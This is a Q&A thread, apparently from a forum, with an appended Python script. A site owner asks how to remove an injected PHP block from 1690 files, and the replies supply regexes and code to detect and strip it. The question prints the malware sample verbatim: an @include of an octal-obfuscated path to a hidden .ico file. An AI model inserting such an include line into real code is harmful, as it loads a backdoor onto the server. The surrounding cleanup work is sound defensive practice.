Find and Replace using Regular Expression

I try to find a way to find and replace using EMEditor and a Regular Expression. I try to apply this for the item below:

<?php
/*f04b8*/

@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";

/*f04b8*/ // ini_set(?display_errors?, 1);

I try to replace / erase the code between

<?php

and

// ini_set(?display_errors?, 1);

everything in between is this malware script that I try to get out from many files.

I look for an easy way to delete this in 1690 files.
Any idea would be very helpful.

Best wishes,
Thomas

Answer

The PHP RegExpression for any similar strings would be…

/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/

This can be further simplified but works as is

Note this will find all occurrences of the offending strings starting with a comment block containing 5 random characters that are not newlines, followed by two new lines, the @include line, 2 more new lines, and the matching block comment closure – regardless of whether the document was saved on Windows, Mac, or Linux machines – note \r\n (Windows machines) and \n\n (Linux & Mac machines)

I’ve verified your string matches the regex at:
https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/

Quick Heads-up, to find the malware files containing random string names that contain the obfuscated functions… use the following regex…

/function...\(\$..\){\$...\=."/

This should track down the altered files and find any additional malware files of the same for the malware you’re being affected by.

Have a great day! Hopefully this is still useful to someone.

Attribution
Source : Link , Question Author : Thom , Answer Author : Davidw
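
For cleaning all 1690 files outside the editor, the following is an added example, not part of the original question or answer. It removes the injected block from every *.php file under a directory and decodes the octal-escaped @include path so the file it loads can be located. It assumes the marker is five word characters repeated on both sides, as in the sample; the names clean_source, clean_tree and decode_php_escapes are hypothetical.

```python
import re
import shutil
from pathlib import Path

# Marker comment, @include of an escaped path, then the SAME marker again (\1).
# \s* spans the blank lines whether they are \n or \r\n.
# Assumption: the marker is five word characters, as in the sample.
INJECTED = re.compile(
    rb'/\*(\w{5})\*/\s*@include\s+"([^"\r\n]+)";\s*/\*\1\*/[ \t]*'
)
ESCAPE = re.compile(rb'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})')

def decode_php_escapes(raw: bytes) -> str:
    """Resolve PHP octal (\\057) and hex (\\x2f) string escapes to show the real path."""
    def repl(m):
        if m.group(1) is not None:
            return bytes([int(m.group(1), 8) & 0xFF])
        return bytes([int(m.group(2), 16)])
    return ESCAPE.sub(repl, raw).decode("utf-8", "replace")

def clean_source(data: bytes):
    """Return (data without injected blocks, decoded include paths that were found)."""
    paths = [decode_php_escapes(m.group(2)) for m in INJECTED.finditer(data)]
    return INJECTED.sub(b"", data), paths

def clean_tree(root, apply=False):
    """Report infected *.php files under root; with apply=True back up and rewrite them."""
    report = {}
    for path in Path(root).rglob("*.php"):
        data = path.read_bytes()
        cleaned, paths = clean_source(data)
        if paths:
            report[str(path)] = paths
            if apply:
                shutil.copy2(path, path.with_name(path.name + ".bak"))
                path.write_bytes(cleaned)
    return report

# The block from the question, reassembled as bytes.
SAMPLE = (
    b'<?php\n/*f04b8*/\n\n@include "'
    rb'\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s'
    rb'/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o'
    b'";\n\n/*f04b8*/ // ini_set(?display_errors?, 1);\n'
)

if __name__ == "__main__":
    cleaned, paths = clean_source(SAMPLE)
    print(paths)
    print(cleaned.decode())
```

Run clean_tree(root) first as a dry run and review the report before calling it with apply=True. The decoded paths name the files the @include lines load, which need review and removal as well, and the .bak copies still contain the injected block, so move them out of the web root afterwards.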
